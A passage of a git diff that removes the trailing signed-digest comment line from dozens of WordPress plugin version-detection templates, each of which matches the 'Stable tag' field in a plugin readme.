a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 534f8dc8e64..77fc04a2203 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c45c1feb21a189012ccf13eb61ac7c07382913b275cb14f046601a46dfe49baa0220572693fdc965f9a33d51b81fc60d671ad82e7d5f4b37133dfac637a48515b42b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 1377a3b95e7..733f9ee453e 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c2b9acfcdd2beacfd281d03ee8629f34514c969eab251dcb908e8e1b32aa812a02202479485e8d51c76922e387bc70bd8020db87352ed3179de160a1cc83f54726ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 192ebbe2f62..0af08f0ac08 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c67f3a4e61b94cda233ab41ee5b2ad88772e775e993c94d2cef9569cba2bcc9902201266b973bf09a9024886a997ac55a4ccf1e35f7b392ef11e93fce946e7627927:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 062aaaf76e6..1e4c77fbca9 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023485b9d1c97ef81caaf28db89d189f080c7c703b88951fd38ea03201228141f022005b641e18ee83930af7d9c58e2f3b009acbb8b98d86d62fef20ee0d9ee65a6f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 0f568960dd3..295e3fe82db 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ed96f8e99c42e97f3ba1027d0fd404a055aa9f487778e29556be3134c1b0411e02206ef65ba327dd6ea6731af2f33e4ce841ce65338d2af14071bd70d63a9de42182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index d0788d69a17..862f73201fc 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d3983bc5c1b11d6f1e37e06c26e46d062658f372f1036e14079ef2c055f178a0220529cf91b9dc008e90223531238ca83851ae84132fc5136de3d82b25171f57c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 7ad8f7fcb12..711b64f9d07 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024adddef1cc8575045628e710a92492932ea826dea9675d8184feff4aa53692a02207f2c22cb18be07a65c18d859d2210d7b6b3b36499dcd893541e3fd2a01fcca4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 5b3756a8e62..58ddcfab78a 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022054db2a79331ce53cfa3377b5007bf2a2813e266520bf7b67c9b39cb4aa1fce87022100c7d8aa26237209fbe40d963bc6686ad694877db2be39881ad842e1895ce009f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc21c8f2dbb..305d74e8eaf 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5a7ebe491eac618d380f20010d3ee8e990e25cba87819a8a6038cf67e79251a022100fd900801243ea273ecf33b99fcd808204a2854adb58264f57118331195420878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 39139aa0acd..668162fc4e1 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070a70eacb3d380d3a14896ca1465cf52e2a5931b8e1127fb8fad8613b6e00c9702205f5f214c3c3bcd063129741fb132ee08bc3915517ef60cd8ff751fa9a816873e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2498267cdb4..2a233f389dc 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe55a94bc34146352ee1f7a00f8b921744537cc10341a01ca0557c796c82e72402207e117c2003c306137f6ee05ec16be75d4ac3b1b5746b95d5e296bd5d4d9e2453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 310553eab40..a0d2554492c 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001f906d2d1443971efbab8036bf86942ee1001971094887b274fe6bdd7212897022062e2618ac132770d8a570a3d367136ec7c8e76fdefb2dc9b3bc0ab8b32944d6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index a5627a73560..4e5046273d1 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100996c65504fa276044ff9a72b4ffe8a597f69cec349e8b30793cda937e34eca51022100a6b6262a8058645b3e8270081f059d20c74ef2d8c2463da7e188dcc22c0ac6f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 4e07bace101..f44cee79807 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a4dd51509f4ddbb3e2d418da8ff0d7e0b7445ddb2be368fa04863c40b7ee15402206c6114fd46261569eb9172a017efb7fcacf661a3d6a1ebd0666982cd04a8edf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 62f827371c9..39130db767b 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f5906419027ca4e28dc5b5184a6fd3feaa0849a2bf1ef6f0140e71131b736d3022027400b303eff4f75389da5c5589f5f771c882484daeed6c81501b3579dcac971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 0234036af97..39c497073ca 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c839da4ffae139e62619270f1fb153b917417a8bc0f02e0da3aebac03a12ae402201c104d8e26358d74626544d7a7e7f4fba7e3e69ce633cbcad378c6a905327ab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 27a1e88fcf6..b848288b55f 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059e9b8b59ef8a551ce14b2421a39e935471f958bde959a0c93e6d6892ca68ef6022005856757f5c912a57b2b7b42ade6bdd5e2227620728baa6689420fa211207d9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 74c06b9e8d8..4d10178692e 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205bf1eb2f2c55f526ca76f8c5c9c25ac399f8c0e82f0b3a10dca29751597b5926022100b37309bff87f069707fdb6e039fb68dd6ed64c9cc3f0805e254e6470cfd6149c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 4dfda70cca9..7aac0a153f3 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f121452f259672f5b407053694c483358ccee96bd2395aa631cc1198e76bde7022100d49938705cb53862344a047ad2fc4477979aeaa6a52368e55d4b65c358b3dce3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 8e23752da0d..d0cebd5316c 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a7afa6dcad2825c17c4ad45c79336afb59dc3afa80bafbb6f6779d4d7a178a70022100831f2ff96aac7869011749e444b59ba42b13ac929f7f1b34d7df3f8c8b73900f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 6b120a1097e..ff207791572 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad2ef908c15967ebb585997a30acada7f70043ed1b3db5f2726a19aae0775471022023285d1247296434ac8753be7c16f4c30019f6221806e75de7d469153308929d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 71cf83cb9b5..fffdc7d017a 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201e3c7e6476ab9770c7729acbef636ae99c70faf2276462d8856ba0f5f220e7d102210092b8e793c9004c8a637cea84f2a8d1ae5458ec703a38c25ece127475ecffb8e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index a6238f92cdb..7a9746a70d5 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220712a774777fd430603104a71ca2050ee25b5f6059d409aa01d11ce854be41f22022100864927351753149ec79a124b443d634df21312f1443773f95f1efcea63d00d46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 52d4a0c30af..3fe86debf56 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000b4887dd169d4f20dbec9ffd099920de0cfb8aab7ad6e072b8d7ab967793505022100aaebb02d59c636d322d2f7263e709bf9b0443b53365e52e8b4d001fc1c495b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index b09a567b645..18a7437e94b 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068d8281eccca3adcaf0f73fda79ec2dd4578e239f25143e75eea16036022826c022100d93a42f74c0a37e5939fc49a80904752d8012b32487e475d29833df2f6d37046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 83baac132e3..3deac58709d 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022278b708e3696d38c407449ea7ba2813ac3410cd73bf7f994302aadcfa060f4022023db93cffa53f8c26951e0423acf14bc8551b378c92cb9f661f819be43ca0075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index daf2c7ab046..e7e7c276825 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066cf876baa9b565ab6541d1dfcfeb3ecfed665f86eab9ac51408245b095588ab022100ee6c165cc7a94c4dbd81cb463d3e26f1c7bbcde588864acf3d4f9774c4d348c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index bee4359f5e8..ad4ebefa4b1 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022005a6dd258ff77aab78c18fbf983b6ae48552984aabda65c1c7ba35024501a4e9022100c36541820ba03c166388d50dd68d28e8df91b07a5d5439868239ab1f0121d4e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 383e0b34095..8e88c81c0a9 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c062d8b4b21803d6faee3dc304cc9439a971a63406ba6647c0e56c95c02b947022100851d7a1dba1a0c54c3d323c31b2d06b19e21986f0ceceaabc97281089434d223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index a2602c428fa..39d269fb856 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aea99cdb5e168ef33afda2938481c3dcafb9196ae0d8e1592a33e46c1b0c1ee2022100efa19a4ca4d634992caa586ed1f998919e69176c6c413d02a4d91298c36b9551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 8a4e6c5e954..fc126d83c63 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100979b8db91d3c72ea91359957ccd92746a20d60a266e1274432ab492c9f3ba703022025502058d452a7766430cb00498061d19bc176fe96fb1918cbc600e69ba19ab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f49477e5311..8c49a342590 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e5aabb2bee253960734b84bc5e8234701281cbd21e8d44ed3a8eb5ad24beb8702205bcf0081803875ec3ef0d02fa60a326a86be50bde4dd425c651937ffb2447350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c680f9bd70c..c20ed6552a4 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220155ff5f184e83253a5ec48786e9b26f5566e3a736e25950fc010c292d6caad53022100811bcb0294a3f3878a37cf8389f7bdf6c9f5f0970686e1106ecda3f502117558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index b1eac7585c3..6ac2212b4be 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1ddc3de05b2efcc4b20c7c2f1136c05a04d851eca0a29bc96c9d20df4287c69022056e1756ea4f987e5c1e7e68fd2decb4a0fdc9970b218c180b4615c6da2b7a793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 7d97737d04c..71c71b5ed14 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200abfbd4e30f5bdaca1611d5adfe588ed436ea70b20c5c6bf44e930cc2b79cd520221009febda1024b6e8259c977c05374e6e605fec28aaf3b0fec1f7035b972d059d06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 390e137cacf..7b47adc274b 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022007bdf88fe4ebfc78b25ecb872b24b1e483af0bd72611ebab819a3110e600989e02201182a88be9143767c59c7d02d14a655748d0eeb5322c97c6efbe29833afc246e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index f866a5533c4..286dfdaec66 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a4de5a931fce5d5d34dd816472b3dcdcfa036cc1880c8e4d208b92a201a3798b02203f68b59daa3acf4d24b0b2400a94f0ab6b629b09f50d5c7ebe019852946cc5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 2fb21ebd191..c4928059f6c 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204df94a47e55fa8437071e101e3c782e916e841f5d9695209715cc006ceefdbed02201a612f6f6322d3c3ccf10924a38a86ac6e58d0d89e69e8f8a6bab512d8283f77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index daa8a89f1a5..f6a7836f35a 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a55fd33d29e0138b9a91dc7b6ec2083f0edbc66504487b8a9abc93111795a7b802203928e312bad9f05be2eeb241da1ba630ec1b71a04eddb51c5ea73c7fe4c41348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 43dc5974c1c..b7af708c4fa 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203780774630eb0b80372c6d1c86ce2f7d0e7407408c8d8c5fdfc0a3292e698838022100c29ff7b64957923834c61a261aaae9c920d279d90975f7cf0eb45b6307b7105b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index e415e173d11..61a793edf72 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017f0ac373d219a2b740f5f6f317e2bed573d250fc8fd11dd63d446eede525e5e0221009d4e23851c6be23f1f2fa8493c8f9d35438206b8acf4e5bd15b3288136e3c771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index bd7699f6ec9..0da88d5d3f7 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9250325a9c7b7bf3460eb368738763c2e4abbbb3c17514ac499ea928f938e96022100e739dc38ea3d2f9f08245382bca490102d0bd62cacc1cf4c669f542439c5491f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 5d442c68c73..2b29428cf10 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c74eb22070b786cb852fec72eb6a217cf1ec975219120201cebc771d042ff3d02201f37977697fd5e89423aba864d38ae153c68fb0231f0ddf6c7c242dfde73f3c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 2924cceec7b..181e619a7cf 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca167159b715e7342af379315916c39a861d8fa1db494f49d4eeb0d4c58b042402204347670b2bbda4f8ded5efefe53149deb9769054bb1112a150b9642e1a599b5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 6e98acaa55a..8164eb44838 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022063cdb8f40f47d59c3dbbac969cd1cafd1e53454ba2f9234499fdfbb8d8928321022100dceef35ba7254ec3fa06978f8cf1469d8051eaa0ae416d8804d333ba272d96ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 715b7f9fc00..59554defdfc 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202be7e42c76f37c1804b3a7283733b749531c3d04dd1be789cb0f13ad48880846022100e97e4a20e5af59389db0388a34278a8d2ed1a4badaab6513759f1069f61a000d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 2262ae47b81..350fd9436b4 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050761b6503c98f01561111871f9b8eff789ba96db31353e4d908d93c424d3d9202202d9b78c5aa704d3b35e31d1659c93e85e674c2c99d616c21ffcfd79a8fcc9f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 